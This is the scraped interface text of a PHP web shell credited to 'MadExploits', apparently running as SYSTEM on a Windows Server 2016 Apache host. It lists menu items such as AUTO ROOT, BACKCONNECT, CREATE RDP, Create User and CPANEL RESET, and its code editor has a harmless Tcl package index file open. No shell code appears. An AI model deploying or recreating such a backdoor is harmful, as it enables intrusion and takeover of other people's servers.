Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
mingw64 /
lib /
thread2.8.6 /
[ HOME SHELL ]
Name
Size
Permission
Action
pkgIndex.tcl
2.33
KB
-rw-rw-rw-
thread286.dll
138.98
KB
-rw-rw-rw-
ttrace.tcl
28.84
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pkgIndex.tcl
# -*- tcl -*- # Tcl package index file, version 1.1 # if {![package vsatisfies [package provide Tcl] 8.4]} { # Pre-8.4 Tcl interps we dont support at all. Bye! # 9.0+ Tcl interps are only supported on 32-bit platforms. if {![package vsatisfies [package provide Tcl] 9.0] || ($::tcl_platform(pointerSize) != 4)} { return } } # All Tcl 8.4+ interps can [load] Thread 2.8.6 # # For interps that are not thread-enabled, we still call [package ifneeded]. # This is contrary to the usual convention, but is a good idea because we # cannot imagine any other version of Thread that might succeed in a # thread-disabled interp. There's nothing to gain by yielding to other # competing callers of [package ifneeded Thread]. On the other hand, # deferring the error has the advantage that a script calling # [package require Thread] in a thread-disabled interp gets an error message # about a thread-disabled interp, instead of the message # "can't find package Thread". package ifneeded Thread 2.8.6 [list load [file join $dir thread286.dll] [string totitle thread]] # package Ttrace uses some support machinery. # In Tcl 8.4 interps we use some older interfaces if {![package vsatisfies [package provide Tcl] 8.5]} { package ifneeded Ttrace 2.8.6 " [list proc thread_source {dir} { if {[info exists ::env(TCL_THREAD_LIBRARY)] && [file readable $::env(TCL_THREAD_LIBRARY)/ttrace.tcl]} { source $::env(TCL_THREAD_LIBRARY)/ttrace.tcl } elseif {[file readable [file join $dir .. lib ttrace.tcl]]} { source [file join $dir .. lib ttrace.tcl] } elseif {[file readable [file join $dir ttrace.tcl]]} { source [file join $dir ttrace.tcl] } if {[namespace which ::ttrace::update] ne ""} { ::ttrace::update } }] [list thread_source $dir] [list rename thread_source {}]" return } # In Tcl 8.5+ interps; use [::apply] package ifneeded Ttrace 2.8.6 [list ::apply {{dir} { if {[info exists ::env(TCL_THREAD_LIBRARY)] && [file readable $::env(TCL_THREAD_LIBRARY)/ttrace.tcl]} { source $::env(TCL_THREAD_LIBRARY)/ttrace.tcl } elseif {[file readable [file join $dir .. lib ttrace.tcl]]} { source [file join $dir .. lib ttrace.tcl] } elseif {[file readable [file join $dir ttrace.tcl]]} { source [file join $dir ttrace.tcl] } if {[namespace which ::ttrace::update] ne ""} { ::ttrace::update } }} $dir]
Close